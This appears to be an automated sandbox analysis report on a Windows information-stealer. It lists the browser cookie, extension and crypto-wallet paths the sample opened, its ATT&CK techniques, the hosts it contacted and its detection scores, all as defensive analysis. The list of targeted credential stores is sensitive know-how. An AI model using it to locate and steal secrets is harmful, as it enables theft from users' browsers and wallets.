            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDBJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session StorageJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmiedaJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeeaJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BookmarksJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\temporaryJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\jsJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM StoreJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App SettingsJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashesJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shmJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation PlatformJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\defaultJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCacheJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabaseJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics DatabaseJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.filesJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dirJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorageJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dirJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjfJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDBJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDBJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\NetworkJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension SettingsJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shmJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backupsJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasmJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\to-be-removedJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_stateJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storageJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibagJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnkJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmpJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\EncryptionJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCacheJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.filesJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\dbJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDBJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-walJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncmJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\gleanJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldbJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\walletsJump to behavior
            Source: Yara matchFile source: 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2000507238.000002DCD1A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2000591564.000002DCD1B20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe PID: 6816, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2000507238.000002DCD1A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe PID: 6816, type: MEMORYSTR
            Source: Yara matchFile source: 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1999333870.000002DCD07D8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2000507238.000002DCD1A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2000591564.000002DCD1B20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe PID: 6816, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure1
            Valid Accounts
            331
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            2
            Disable or Modify Tools
            1
            OS Credential Dumping
            12
            System Time Discovery
            Remote Services1
            Archive Collected Data
            3
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            Data Encrypted for Impact
            CredentialsDomainsDefault Accounts1
            Native API
            1
            Valid Accounts
            1
            Valid Accounts
            1
            Deobfuscate/Decode Files or Information
            1
            GUI Input Capture
            2
            System Network Connections Discovery
            Remote Desktop Protocol4
            Data from Local System
            11
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts11
            Command and Scripting Interpreter
            1
            Windows Service
            1
            Windows Service
            11
            Obfuscated Files or Information
            Security Account Manager2
            File and Directory Discovery
            SMB/Windows Admin Shares1
            GUI Input Capture
            4
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts1
            Service Execution
            1
            Registry Run Keys / Startup Folder
            11
            Process Injection
            11
            Software Packing
            NTDS55
            System Information Discovery
            Distributed Component Object Model1
            Email Collection
            5
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
            Registry Run Keys / Startup Folder
            1
            Timestomp
            LSA Secrets561
            Security Software Discovery
            SSH1
            Clipboard Data
            Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading
            Cached Domain Credentials2
            Process Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
            Masquerading
            DCSync151
            Virtualization/Sandbox Evasion
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Valid Accounts
            Proc Filesystem1
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Modify Registry
            /etc/passwd and /etc/shadow1
            Remote System Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron151
            Virtualization/Sandbox Evasion
            Network Sniffing31
            System Network Configuration Discovery
            Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd11
            Process Injection
            Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1431281 Sample: SecuriteInfo.com.Win64.Evo-... Startdate: 24/04/2024 Architecture: WINDOWS Score: 100 93 store8.gofile.io 2->93 95 ip-api.com 2->95 97 2 other IPs or domains 2->97 113 Antivirus detection for URL or domain 2->113 115 Antivirus / Scanner detection for submitted sample 2->115 117 Sigma detected: Capture Wi-Fi password 2->117 119 6 other signatures 2->119 10 SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe 58 2->10         started        14 Exela.exe 2->14         started        16 svchost.exe 2->16         started        signatures3 process4 file5 77 C:\Users\...\_quoting_c.cp311-win_amd64.pyd, PE32+ 10->77 dropped 79 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 10->79 dropped 81 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32+ 10->81 dropped 89 29 other malicious files 10->89 dropped 145 Modifies the windows firewall 10->145 147 Tries to harvest and steal WLAN passwords 10->147 149 Gathers network related connection and port information 10->149 18 SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe 134 10->18         started        83 C:\Users\...\_quoting_c.cp311-win_amd64.pyd, PE32+ 14->83 dropped 85 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 14->85 dropped 87 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32+ 14->87 dropped 91 29 other malicious files 14->91 dropped 151 Antivirus detection for dropped file 14->151 153 Multi AV Scanner detection for dropped file 14->153 155 Machine Learning detection for dropped file 14->155 signatures6 process7 dnsIp8 99 ip-api.com 208.95.112.1, 49740, 80 TUT-ASUS United States 18->99 101 api.gofile.io 51.38.43.18, 443, 49760 OVHFR France 18->101 103 4 other IPs or domains 18->103 69 C:\Users\user\AppData\Local\...xela.exe, PE32+ 18->69 dropped 71 C:\Users\user\AppData\...\VLZDGUKUTZ.pdf, ASCII 18->71 dropped 73 C:\Users\user\AppData\...\VLZDGUKUTZ.docx, ASCII 18->73 dropped 75 8 other malicious files 18->75 dropped 121 Found many strings related to Crypto-Wallets (likely being stolen) 18->121 123 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 18->123 125 Tries to harvest and steal browser information (history, passwords, etc) 18->125 127 5 other signatures 18->127 23 cmd.exe 1 18->23         started        26 cmd.exe 18->26         started        28 cmd.exe 1 18->28         started        30 15 other processes 18->30 file9 signatures10 process11 signatures12 129 Uses netstat to query active network connections and open ports 23->129 131 Uses netsh to modify the Windows network and firewall settings 23->131 133 Uses ipconfig to lookup or modify the Windows network settings 23->133 135 Uses attrib.exe to hide files 23->135 32 conhost.exe 23->32         started        137 Overwrites the password of the administrator account 26->137 139 Gathers network related connection and port information 26->139 141 Performs a network lookup / discovery via ARP 26->141 34 systeminfo.exe 26->34         started        37 net.exe 26->37         started        39 net.exe 26->39         started        47 16 other processes 26->47 41 WMIC.exe 1 28->41         started        43 conhost.exe 28->43         started        143 Tries to harvest and steal WLAN passwords 30->143 45 WMIC.exe 30->45         started        49 28 other processes 30->49 process13 signatures14 105 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 34->105 51 WmiPrvSE.exe 34->51         started        107 Overwrites the password of the administrator account 37->107 53 net1.exe 37->53         started        55 net1.exe 39->55         started        109 Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes) 41->109 111 Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes) 41->111 57 Conhost.exe 45->57         started        59 quser.exe 47->59         started        61 net1.exe 47->61         started        67 2 other processes 47->67 63 chcp.com 49->63         started        65 chcp.com 49->65         started        process15

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe39%ReversingLabsWin64.Trojan.Zusy
            SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe100%AviraHEUR/AGEN.1306040
            SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe100%AviraHEUR/AGEN.1306040
            C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe39%ReversingLabsWin64.Trojan.Zusy
            C:\Users\user\AppData\Local\Temp\_MEI67602\VCRUNTIME140.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI67602\_asyncio.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI67602\_bz2.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI67602\_cffi_backend.cp311-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI67602\_ctypes.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI67602\_decimal.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI67602\_hashlib.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI67602\_lzma.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI67602\_multiprocessing.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI67602\_overlapped.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI67602\_queue.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI67602\_socket.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI67602\_sqlite3.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI67602\_ssl.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI67602\_uuid.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI67602\aiohttp\_helpers.cp311-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI67602\aiohttp\_http_parser.cp311-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI67602\aiohttp\_http_writer.cp311-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI67602\aiohttp\_websocket.cp311-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI67602\cryptography\hazmat\bindings\_rust.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI67602\frozenlist\_frozenlist.cp311-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI67602\libcrypto-1_1.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI67602\libffi-8.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI67602\libssl-1_1.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI67602\multidict\_multidict.cp311-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI67602\pyexpat.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI67602\python3.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI67602\python311.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI67602\select.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI67602\sqlite3.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI67602\unicodedata.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI67602\yarl\_quoting_c.cp311-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI80682\VCRUNTIME140.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI80682\_asyncio.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI80682\_bz2.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI80682\_cffi_backend.cp311-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI80682\_ctypes.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI80682\_decimal.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI80682\_hashlib.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI80682\_lzma.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI80682\_multiprocessing.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI80682\_overlapped.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI80682\_queue.pyd0%ReversingLabs
